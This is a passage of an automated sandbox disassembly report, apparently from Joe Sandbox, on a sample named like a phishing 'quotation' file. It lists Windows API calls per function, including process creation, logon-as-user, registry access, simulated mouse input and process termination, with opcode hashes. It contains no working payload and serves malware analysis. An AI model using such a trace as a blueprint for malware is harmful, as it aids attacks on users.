                                                                        • Part of subcall function 00E29B5C: _free.LIBCMT ref: 00E29C5D
                                                                        • Part of subcall function 00E29B5C: DeleteCriticalSection.KERNEL32(02,?,?,00E29AF9,00E27CD0,00EBA0B8,00000014), ref: 00E29C7F
                                                                      • __calloc_crt.LIBCMT ref: 00E29B19
                                                                      • __initptd.LIBCMT ref: 00E29B3B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E29B42
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                      • String ID:
                                                                      • API String ID: 3567560977-0
                                                                      • Opcode ID: 6f9f28684b29b7612e002590b9fd065b7e26c080460687c03884c713bf40eba2
                                                                      • Instruction ID: 0d2314b693a189f163108cd70adcea04f992fa0a29b1685b0c959d884dadb088
                                                                      • Opcode Fuzzy Hash: 6f9f28684b29b7612e002590b9fd065b7e26c080460687c03884c713bf40eba2
                                                                      • Instruction Fuzzy Hash: 58F0903251A7315EE6347775BC0768A26D0EF42734F203A5AF464F51D3EF21844145A8
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E8B644
                                                                      • _memset.LIBCMT ref: 00E8B653
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EC6F20,00EC6F64), ref: 00E8B682
                                                                      • CloseHandle.KERNEL32 ref: 00E8B694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                      • String ID: o$do
                                                                      • API String ID: 3277943733-2180341428
                                                                      • Opcode ID: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                                                                      • Instruction ID: 7cf954725c038dfbba0bbd56d732743806a7eeb321e48610e31fc1426f6cf79c
                                                                      • Opcode Fuzzy Hash: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                                                                      • Instruction Fuzzy Hash: F2F05EB2640350BEE2102B62BC06FBB3A9CEB08395F005038FA0CF5192D7728C0587A8
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E23F85), ref: 00E24085
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E2408C
                                                                      • EncodePointer.KERNEL32(00000000), ref: 00E24097
                                                                      • DecodePointer.KERNEL32(00E23F85), ref: 00E240B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                      • String ID: RoUninitialize$combase.dll
                                                                      • API String ID: 3489934621-2819208100
                                                                      • Opcode ID: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                                                                      • Instruction ID: 7427d3fcf5f5f1b2006c784e4c25da70115cf127132f68bf1284cf784194d582
                                                                      • Opcode Fuzzy Hash: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                                                                      • Instruction Fuzzy Hash: 10E092B0582300AFEA10AF73ED0DF453AA4BB04B46F14903AF205F10A0CBB786499B15
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 3253778849-0
                                                                      • Opcode ID: d95287eae757dcb424553008273b04817afa5e8964500229668228a1b7bb8732
                                                                      • Instruction ID: 15200df926c48acf4cdd213463187e2d3bad1b4ad6ec2e86927c076e954fcf1a
                                                                      • Opcode Fuzzy Hash: d95287eae757dcb424553008273b04817afa5e8964500229668228a1b7bb8732
                                                                      • Instruction Fuzzy Hash: A5619A7090025A9BCF05EF60EC82AFE37A5AF05348F04A958F8567B2D3DB34A845CB50
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E802BD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E802FD
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E80320
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E80349
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E8038C
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E80399
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                      • String ID:
                                                                      • API String ID: 4046560759-0
                                                                      • Opcode ID: 1f98df33b0c6cb7a08bb7a6302749873d681927ed645d681573836f83b699f76
                                                                      • Instruction ID: 5a4d0e071bcd54cfe14585b40aa7801066ca9f7783096f5b50fab4f72b3ea39d
                                                                      • Opcode Fuzzy Hash: 1f98df33b0c6cb7a08bb7a6302749873d681927ed645d681573836f83b699f76
                                                                      • Instruction Fuzzy Hash: 93515931108200AFC710EF64D885E6FBBE8FF85314F04591DF599A72A2DB31E949CB52
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 00E857FB
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00E85832
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E8585A
                                                                      • GetMenuItemID.USER32(?,?), ref: 00E858C9
                                                                      • GetSubMenu.USER32(?,?), ref: 00E858D7
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E85928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                      • String ID:
                                                                      • API String ID: 650687236-0
                                                                      • Opcode ID: e99a5132d5f0dec457b6c00588b2e743ece86985107b86cc3980c585c379184e
                                                                      • Instruction ID: 5adf6bc4db34fe99b9c24c8a550c8afe003ac88dd22e34864cbe8c45950183d4
                                                                      • Opcode Fuzzy Hash: e99a5132d5f0dec457b6c00588b2e743ece86985107b86cc3980c585c379184e
                                                                      • Instruction Fuzzy Hash: 0D516E76E00615EFCF15EF64C8459AEB7F4EF48310F10506AE859BB392CB34AE418B90
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00E5EF06
                                                                      • VariantClear.OLEAUT32(00000013), ref: 00E5EF78
                                                                      • VariantClear.OLEAUT32(00000000), ref: 00E5EFD3
                                                                      • _memmove.LIBCMT ref: 00E5EFFD
                                                                      • VariantClear.OLEAUT32(?), ref: 00E5F04A
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E5F078
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                      • String ID:
                                                                      • API String ID: 1101466143-0
                                                                      • Opcode ID: 9f1ef02aca78842fe3ced804151d183dbfe679f8a12520355a734f4f81004040
                                                                      • Instruction ID: 1f5bbaf7c670f46ebebd75374c46c088a114981ec053a2eebbf29e72b61d9dbe
                                                                      • Opcode Fuzzy Hash: 9f1ef02aca78842fe3ced804151d183dbfe679f8a12520355a734f4f81004040
                                                                      • Instruction Fuzzy Hash: 8B516CB5A00209DFCB14CF58C884AAAB7B9FF4C314B15856AED59EB341E734E915CBA0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62258
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E622A3
                                                                      • IsMenu.USER32(00000000), ref: 00E622C3
                                                                      • CreatePopupMenu.USER32 ref: 00E622F7
                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00E62355
                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E62386
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                      • String ID:
                                                                      • API String ID: 3311875123-0
                                                                      • Opcode ID: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                                                                      • Instruction ID: 162684595300cc8af454de4a8d9f1aa3ee2cd92d1db0a7e5e782e9e1d28aa4ae
                                                                      • Opcode Fuzzy Hash: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                                                                      • Instruction Fuzzy Hash: 4451CF3068064ADFDF21CF68E888BADBBF4BF05398F10512DEA15B7290D3748944CB51
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E0179A
                                                                      • GetWindowRect.USER32(?,?), ref: 00E017FE
                                                                      • ScreenToClient.USER32(?,?), ref: 00E0181B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E0182C
                                                                      • EndPaint.USER32(?,?), ref: 00E01876
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 1827037458-0
                                                                      • Opcode ID: a4a461cfd398bb981b2a8d43bfc127ae08815cef655ad925110eeb5cb9963081
                                                                      • Instruction ID: e5361cf423ba0006bd6d90a3744663c4ed8b4f2a4d8a147ef9023049b8a705c7
                                                                      • Opcode Fuzzy Hash: a4a461cfd398bb981b2a8d43bfc127ae08815cef655ad925110eeb5cb9963081
                                                                      • Instruction Fuzzy Hash: F841B131100300AFC714DF25DC88FAA7BE8EB45724F044279F699AA1F1C731A889DB61
                                                                      APIs
                                                                      • ShowWindow.USER32(00EC57B0,00000000,01014DD0,?,?,00EC57B0,?,00E8B5A8,?,?), ref: 00E8B712
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00E8B736
                                                                      • ShowWindow.USER32(00EC57B0,00000000,01014DD0,?,?,00EC57B0,?,00E8B5A8,?,?), ref: 00E8B796
                                                                      • ShowWindow.USER32(00000000,00000004,?,00E8B5A8,?,?), ref: 00E8B7A8
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00E8B7CC
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E8B7EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
                                                                      • Instruction ID: d973f555af2bc583b5485cc10d16146556380cdf74bd01e29d429fac7c1647d2
                                                                      • Opcode Fuzzy Hash: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
                                                                      • Instruction Fuzzy Hash: 03417534600240AFDB22DF24C499B957BE1FF49314F5852BAE94CAF672C732A856CB50
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00E74E41,?,?,00000000,00000001), ref: 00E770AC
                                                                        • Part of subcall function 00E739A0: GetWindowRect.USER32(?,?), ref: 00E739B3
                                                                      • GetDesktopWindow.USER32 ref: 00E770D6
                                                                      • GetWindowRect.USER32(00000000), ref: 00E770DD
                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E7710F
                                                                        • Part of subcall function 00E65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC
                                                                      • GetCursorPos.USER32(?), ref: 00E7713B
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E77199
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                       • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                      • String ID:
                                                                      • API String ID: 4137160315-0
                                                                      • Opcode ID: 063107fdb35a2b728ed42a04ad106e0c7dd0f65fb417a8e74c17ee171b43f612
                                                                      • Instruction ID: 9f0a9ee602a05e3a59aa7ac9f2132a127ea03dbadd190c92f44a207a335bfdb7
                                                                      • Opcode Fuzzy Hash: 063107fdb35a2b728ed42a04ad106e0c7dd0f65fb417a8e74c17ee171b43f612
                                                                      • Instruction Fuzzy Hash: CA31B272609305AFD720DF14D849B9BB7E9FF88314F004919F589A7191DB70EA19CB92
APIs
  • Part of subcall function 00E580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E580C0
  • Part of subcall function 00E580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E580CA
  • Part of subcall function 00E580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E580D9
  • Part of subcall function 00E580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E580E0
  • Part of subcall function 00E580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E580F6
• GetLengthSid.ADVAPI32(?,00000000,00E5842F), ref: 00E588CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E588D6
• HeapAlloc.KERNEL32(00000000), ref: 00E588DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00E588F6
• GetProcessHeap.KERNEL32(00000000,00000000,00E5842F), ref: 00E5890A
• HeapFree.KERNEL32(00000000), ref: 00E58911
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: f50f169a31eb97d998c3865927ab2285b3a6d04a8a57fc795cb94fab51612277
• Instruction ID: 7d15b3601cba6f70a9ea4cc0bf1b06b2170f4154a612d8acb6eba432abe5755f
• Opcode Fuzzy Hash: f50f169a31eb97d998c3865927ab2285b3a6d04a8a57fc795cb94fab51612277
• Instruction Fuzzy Hash: 4511B131501209FFDB149FA5DD09BBEB7A8EB84316F504428E849F7211CB32AD18DB60
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E585E2
• OpenProcessToken.ADVAPI32(00000000), ref: 00E585E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E585F8
• CloseHandle.KERNEL32(00000004), ref: 00E58603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E58632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00E58646
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
• Instruction ID: fa7c500b49624219ef57875f2d857e169fb514a7bf048eb022d59f124120b83f
• Opcode Fuzzy Hash: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
• Instruction Fuzzy Hash: 70115972501209AFDF018FA5DE49BEE7BA9EF08309F144065FE04B2160C7728E68EB60
APIs
• GetDC.USER32(00000000), ref: 00E5B7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00E5B7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E5B7CD
• ReleaseDC.USER32(00000000,00000000), ref: 00E5B7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E5B7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 00E5B7FE
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 78786a452a3d320577c07605b81b9cbef155830014dad882a15da44fc49e91f2
• Instruction ID: 5f4a21d749995b0938b4d6a5e553709e6358604d75bbfec0d6baa5a6205b68f3
• Opcode Fuzzy Hash: 78786a452a3d320577c07605b81b9cbef155830014dad882a15da44fc49e91f2
• Instruction Fuzzy Hash: 6F018475E00209BFEF109BA69C49A5EBFB8EB48351F0041B6FE08B7291D6309C14CF90
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E201A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E201B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00E201B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00E201C1
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
• Instruction ID: 37620c0a6671a5cec699ac88e052411fee0bf3f1276c3770c25fc5cdfde5b358
• Opcode Fuzzy Hash: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
• Instruction Fuzzy Hash: 7F016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A868CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E653F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E6540F
• GetWindowThreadProcessId.USER32(?,?), ref: 00E6541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E6542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E65437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E6543E
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
• Instruction ID: 2a80090c245926b0a5eedaf22d153c79016223f97f31931722b5103823954e97
• Opcode Fuzzy Hash: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
• Instruction Fuzzy Hash: F7F06D32241558BFE3205BA39C0DEAB7A7CEFCAB11F000269FA09E1051EAA01A0597B5
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00E67243
• EnterCriticalSection.KERNEL32(?,?,00E10EE4,?,?), ref: 00E67254
• TerminateThread.KERNEL32(00000000,000001F6,?,00E10EE4,?,?), ref: 00E67261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E10EE4,?,?), ref: 00E6726E
  • Part of subcall function 00E66C35: CloseHandle.KERNEL32(00000000,?,00E6727B,?,00E10EE4,?,?), ref: 00E66C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00E67281
• LeaveCriticalSection.KERNEL32(?,?,00E10EE4,?,?), ref: 00E67288
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
• Instruction ID: 568ff789e9dbf2684c05766fc0ad8cb53dfdc57e4cfbe15036995c8e9a4f9a72
• Opcode Fuzzy Hash: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
• Instruction Fuzzy Hash: 45F0BE36480602EFD7111BA4EC4C9DB7729EF04312B100131F107B00B0CB7A5818CB50
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E5899D
• UnloadUserProfile.USERENV(?,?), ref: 00E589A9
• CloseHandle.KERNEL32(?), ref: 00E589B2
• CloseHandle.KERNEL32(?), ref: 00E589BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 00E589C3
• HeapFree.KERNEL32(00000000), ref: 00E589CA
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
• Instruction ID: 4f38d140f51314c040ab9ea8713d28c79b8c98bc657e8ccc59a5474d20c28a84
• Opcode Fuzzy Hash: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
• Instruction Fuzzy Hash: B1E0C236004001FFDA011FE2EC0C90ABB69FB89322B108231F219E1075CB329428DB50
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E576EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57702
• CLSIDFromProgID.OLE32(?,?,00000000,00E8FB80,000000FF,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57727
• _memcmp.LIBCMT ref: 00E57748
Strings
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,
• API String ID: 314563124-1556401989
• Opcode ID: 1a23ea9f86bcde46a24f37ff1051b410e6c2b16beb8e0bfc3cf1fb347a81e2d2
• Instruction ID: c6a084e412996204d473d8448844a35cd25c15a482fa526c6018a00c7cb54ce6
• Opcode Fuzzy Hash: 1a23ea9f86bcde46a24f37ff1051b410e6c2b16beb8e0bfc3cf1fb347a81e2d2
• Instruction Fuzzy Hash: B0812C71A00109EFCB04DFA4D984DEEB7B9FF89316F204559E945BB250DB71AE0ACB60
APIs
• VariantInit.OLEAUT32(?), ref: 00E78613
• CharUpperBuffW.USER32(?,?), ref: 00E78722
• VariantClear.OLEAUT32(?), ref: 00E7889A
  • Part of subcall function 00E67562: VariantInit.OLEAUT32(00000000), ref: 00E675A2
  • Part of subcall function 00E67562: VariantCopy.OLEAUT32(00000000,?), ref: 00E675AB
  • Part of subcall function 00E67562: VariantClear.OLEAUT32(00000000), ref: 00E675B7
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
